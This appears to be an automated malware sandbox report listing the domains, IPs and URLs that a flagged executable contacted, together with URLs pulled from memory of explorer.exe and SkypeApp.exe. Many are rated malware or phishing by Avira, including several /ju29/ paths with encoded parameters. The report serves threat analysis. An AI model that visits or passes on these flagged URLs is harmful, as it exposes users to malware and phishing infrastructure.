          http://www.townstart.shop/ju29/100%Avira URL Cloudmalware
          http://www.xuangesmd.comReferer:0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.umertazkeer.com
          103.224.212.216
          truetrueunknown
          www.klxcv.xyz
          198.177.124.40
          truetrueunknown
          www.wokeeducationhateskids.com
          75.2.115.196
          truetrueunknown
          td-ccm-neg-87-45.wixdns.net
          34.149.87.45
          truetrueunknown
          www.sklm888.com
          108.186.24.175
          truetrueunknown
          www.xuangesmd.com
          154.17.26.8
          truetrueunknown
          ssl1.prod.systemdragon.com
          104.17.158.1
          truetrue
            unknown
            glocraze.com
            3.33.130.190
            truetrueunknown
            www.durufilmyapim.com
            unknown
            unknowntrueunknown
            www.gaming-chairs-vn-vi-2885437.fyi
            unknown
            unknowntrueunknown
            www.mzfgwh.top
            unknown
            unknowntrueunknown
            www.glocraze.com
            unknown
            unknowntrueunknown
            www.townstart.shop
            unknown
            unknowntrueunknown
            www.e9pf4s.top
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://www.durufilmyapim.com/ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA==true
              • Avira URL Cloud: malware
              unknown
              http://www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Qtrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://github.com/Microsoft/SimpleRestClients)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://github.com/n-eSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.merchascarpamici.comexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.durufilmyapim.com/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.e9pf4s.top/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://github.com/mwiktorczykSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://github.com/zbtang/React-Native-ViewPager)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 00000005.00000000.1234977867.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://www.durufilmyapim.comexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://github.com/ProjectSeptemberInc/gl-react)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://github.com/facebook/prop-types)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://www.merchascarpamici.comReferer:explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.umertazkeer.com/ju29/www.mzfgwh.topexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://github.com/dmnd/dedent)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.sklm888.comexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.merchascarpamici.com/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.umertazkeer.comexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://github.com/lodash/lodash)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/bitstadium/HockeySDK-Android)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.newtek.com/)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/oblador/react-native-keychain)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.merchascarpamici.com/ju29/:explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://github.com/DefinitelyTyped/DefinitelyTypedSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/SlexAxton/messageformat.js)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://wns.windows.com/explorer.exe, 00000005.00000000.1237220182.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3728348444.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074166064.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/DovydasNavickasSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://typescriptlang.orgSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/Microsoft/ReSub)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Sunnyyoung/SYFlatButton)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/facebook/rebound-js)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://github.com/lelandrichardson/react-native-safe-module)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000003.3074623162.000000000C420000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273873854.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2272431891.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3744922659.000000000C42F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1240160729.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074724370.000000000C42C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.wokeeducationhateskids.comexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://github.com/necolas/normalize.css/)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/madriska/react-native-quick-actions)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/juliangruber/isarray)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/oysteinkrog/SQLite.Net-PCL)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/open-source-parsers/jsoncpp/)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/opencover/opencover)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://microsoft.github.io/Win2D/html/Introduction.htm)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.mnchentampere.com/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://github.com/mysticatea/event-target-shim)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://github.com/jordanbyron/)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/seegno/google-libphonenumber)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://mad4milk.net/SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://github.com/facebook/metro)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.dwijtechnology.com/ju29/www.klxcv.xyzexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://www.unicode.org/cldr/data/.SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/facebook/immutable-js)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://nsis.sf.net/NSIS_ErrorSecuriteInfo.com.FileRepMalware.16340.31219.exefalse
                                                                                            high
                                                                                            https://github.com/google/gson)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/moment/moment)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/jryans/timers-browserify)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.bodacristianyjuani.comexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  http://www.xuangesmd.com/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://maps.google.com/maps/api/geocode/jsonSkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/kjur/jsrsasign)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/facebook/fbjs)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/facebook/regenerator/tree/master/packages/regenerator-runtime)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.mzfgwh.topexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://github.com/Gozala/events)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/zeux/pugixml)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/hoo29SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/facebook/yoga)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.xuangesmd.comexplorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/aosp-mirror/platform_development/blob/master/samples/ApiDemos/src/com/example/andSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://aka.ms/fabric-assets-licenseSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.wokeeducationhateskids.com/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.dwijtechnology.com/ju29/explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://github.com/square/okhttp)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/facebook/react-native)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/google/glog)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.newtonsoft.com/json)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/ide/react-clone-referenced-element)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.microexplorer.exe, 00000005.00000000.1236699757.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3723499643.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1235635823.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://github.com/feross/buffer)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.nuget.org/packages/JetBrains.Annotations/10.1.5)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.adjust.comSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/airbnb/lottie-react-native)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/vvakameSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.jetbrains.comSkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/airbnb/react-native-maps)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/feross/ieee754)SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
